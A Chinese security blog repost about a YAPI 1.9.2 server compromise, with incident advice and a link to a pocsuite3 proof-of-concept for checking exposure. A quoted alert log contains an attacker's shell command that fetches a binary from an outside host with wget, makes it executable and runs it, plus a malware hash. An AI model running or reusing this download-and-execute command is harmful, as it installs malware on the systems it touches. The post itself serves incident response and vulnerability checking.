​Yapi有安全漏洞,服务器被入侵了,附POC

admin 2021年12月5日03:53:45评论242 views字数 846阅读2分49秒阅读模式

    最近看到有人的YAPI接口管理平台服务器被黑了。发现这个漏洞好像部分还存在,漏洞利用前提还是在注册用户的前提下。所以应急方式也是先关闭注册功能,排查已经注册的用户。看看有没有恶意用户。

版本号

版本: 1.9.2

什么问题

服务器被入侵了, 阿里云报的:

  1. -[25877] PM2 v4.4.0: God Daemon (/root/.pm2)

  2. -[26378] node server/app.js

  3. -[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000

  4. -[25877] PM2 v4.4.0: God Daemon (/root/.pm2)

  5. -[26378] node server/app.js

  6. -[25877] PM2 v4.4.0: God Daemon (/root/.pm2)

  7. -[26378] node server/app.js

  8. -[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000

  9. -[31502] ./20000

  10. -[31503] ./20000

  11. 该告警由如下引擎检测发现:

  12. 文件路径: /usr/bin/ps

  13. 恶意文件md5: c303c2fff08565b7977afccb762e2072

  14. 扫描来源方式: 进程启动扫描

  15. 进程id: 31969

  16. 进程命令行: ps aux

如何复现此问题

~

什么浏览器

~

什么系统(Linux, Windows, macOS)

Centos

​Yapi有安全漏洞,服务器被入侵了,附POC

​Yapi有安全漏洞,服务器被入侵了,附POC

​Yapi有安全漏洞,服务器被入侵了,附POC

截图来自: https://github.com/YMFE/yapi/issues/2229

验证漏洞

​Yapi有安全漏洞,服务器被入侵了,附POC


开源验证的POC,用的pocsuite3框架,方便批量验证。及时验证资产。减少风险暴露。

POC地址:

https://github.com/awake1t/SomePocsuitePoc/blob/main/yapi-1.9.2-poc.py


本文始发于微信公众号(渗透测试教程):​Yapi有安全漏洞,服务器被入侵了,附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月5日03:53:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​Yapi有安全漏洞,服务器被入侵了,附POChttps://cn-sec.com/archives/412832.html

发表评论

匿名网友 填写信息